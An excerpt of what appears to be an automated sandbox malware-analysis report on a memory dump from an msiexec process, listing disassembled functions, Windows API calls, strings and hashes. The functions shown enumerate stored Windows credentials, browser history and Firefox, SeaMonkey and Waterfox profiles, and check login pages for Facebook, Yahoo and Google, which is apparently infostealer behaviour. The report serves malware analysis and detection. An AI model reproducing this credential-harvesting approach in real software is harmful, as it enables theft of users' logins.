                                                                                                          • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 2827331108-0
                                                                                                          • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                          • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                          • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                          • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0040C298
                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                          • wcschr.MSVCRT ref: 0040C324
                                                                                                          • wcschr.MSVCRT ref: 0040C344
                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                          • GetLastError.KERNEL32 ref: 0040C373
                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                          • String ID: visited:
                                                                                                          • API String ID: 1157525455-1702587658
                                                                                                          • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                          • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 782 40e283-40e286 775->782 776->775 787 40e21b-40e21d 776->787 783 40e291-40e294 call 40aa04 782->783 784 40e288-40e290 free 782->784 783->769 784->783 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
                                                                                                          APIs
                                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                          • memset.MSVCRT ref: 0040E1BD
                                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                          • free.MSVCRT ref: 0040E28B
                                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                          • _snwprintf.MSVCRT ref: 0040E257
                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                          • API String ID: 2804212203-2982631422
                                                                                                          • Opcode ID: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                                                                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                          • Opcode Fuzzy Hash: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                                                                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                            • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                          • memset.MSVCRT ref: 0040BC75
                                                                                                          • memset.MSVCRT ref: 0040BC8C
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                          • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                          • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 115830560-3916222277
                                                                                                          • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                          • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                            • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                          • _wcslwr.MSVCRT ref: 0040C817
                                                                                                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                          • wcslen.MSVCRT ref: 0040C82C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                          • API String ID: 2936932814-4196376884
                                                                                                          • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                          • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                          • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                          • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 886 40bdb0-40bdce call 404363 889 40bf63-40bf6f call 40440c 886->889 890 40bdd4-40bddd 886->890 892 40bdee 890->892 893 40bddf-40bdec CredEnumerateW 890->893 894 40bdf0-40bdf2 892->894 893->894 894->889 896 40bdf8-40be18 call 40b2cc wcslen 894->896 899 40bf5d 896->899 900 40be1e-40be20 896->900 899->889 900->899 901 40be26-40be42 wcsncmp 900->901 902 40be48-40be77 call 40bd5d call 404423 901->902 903 40bf4e-40bf57 901->903 902->903 908 40be7d-40bea3 memset 902->908 903->899 903->900 909 40bea5 908->909 910 40bea7-40beea memcpy 908->910 909->910 911 40bf11-40bf2d wcschr 910->911 912 40beec-40bf06 call 40b2cc _wcsnicmp 910->912 914 40bf38-40bf48 LocalFree 911->914 915 40bf2f-40bf35 911->915 912->911 917 40bf08-40bf0e 912->917 914->903 915->914 917->911
                                                                                                          APIs
                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                          • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                          • wcslen.MSVCRT ref: 0040BE06
                                                                                                          • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                          • memset.MSVCRT ref: 0040BE91
                                                                                                          • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                          • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                          • wcschr.MSVCRT ref: 0040BF24
                                                                                                          • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 697348961-0
                                                                                                          • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                          • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                          • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                          • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 00403CBF
                                                                                                          • memset.MSVCRT ref: 00403CD4
                                                                                                          • memset.MSVCRT ref: 00403CE9
                                                                                                          • memset.MSVCRT ref: 00403CFE
                                                                                                          • memset.MSVCRT ref: 00403D13
                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                          • memset.MSVCRT ref: 00403DDA
                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                          • String ID: Waterfox$Waterfox\Profiles
                                                                                                          • API String ID: 1829478387-11920434
                                                                                                          • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                          • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                          • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                          • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 00403E50
                                                                                                          • memset.MSVCRT ref: 00403E65
                                                                                                          • memset.MSVCRT ref: 00403E7A
                                                                                                          • memset.MSVCRT ref: 00403E8F
                                                                                                          • memset.MSVCRT ref: 00403EA4
                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                          • memset.MSVCRT ref: 00403F6B
                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                          • API String ID: 1829478387-2068335096
                                                                                                          • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                          • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                          • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                          • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 00403FE1
                                                                                                          • memset.MSVCRT ref: 00403FF6
                                                                                                          • memset.MSVCRT ref: 0040400B
                                                                                                          • memset.MSVCRT ref: 00404020
                                                                                                          • memset.MSVCRT ref: 00404035
                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                          • memset.MSVCRT ref: 004040FC
                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                          • API String ID: 1829478387-3369679110
                                                                                                          • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                          • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                          • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                          • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                          APIs
                                                                                                          • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy
                                                                                                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                          • API String ID: 3510742995-2641926074
                                                                                                          • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                          • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                          • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                          • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                          • GetLastError.KERNEL32 ref: 0041847E
                                                                                                          • free.MSVCRT ref: 0041848B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateErrorFileLastfree
                                                                                                          • String ID: |A
                                                                                                          • API String ID: 981974120-1717621600
                                                                                                          • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                          • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                          • memset.MSVCRT ref: 004033B7
                                                                                                          • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                          • wcscmp.MSVCRT ref: 004033FC
                                                                                                          • _wcsicmp.MSVCRT ref: 00403439
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                          • String ID: $0.@
                                                                                                          • API String ID: 2758756878-1896041820
                                                                                                          • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                          • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                          • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                          • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 2941347001-0
                                                                                                          • Opcode ID: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                                          • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                          • Opcode Fuzzy Hash: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                                          • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 00403C09
                                                                                                          • memset.MSVCRT ref: 00403C1E
                                                                                                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                          • wcscat.MSVCRT ref: 00403C47
                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                          • wcscat.MSVCRT ref: 00403C70
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memsetwcscat$wcscpywcslen
                                                                                                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                          • API String ID: 2489821370-1174173950
                                                                                                          • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                          • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                          • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                          • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0040A824
                                                                                                          • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                          • wcscpy.MSVCRT ref: 0040A854
                                                                                                          • wcscat.MSVCRT ref: 0040A86A
                                                                                                          • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                          • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                          Memory Dump Source
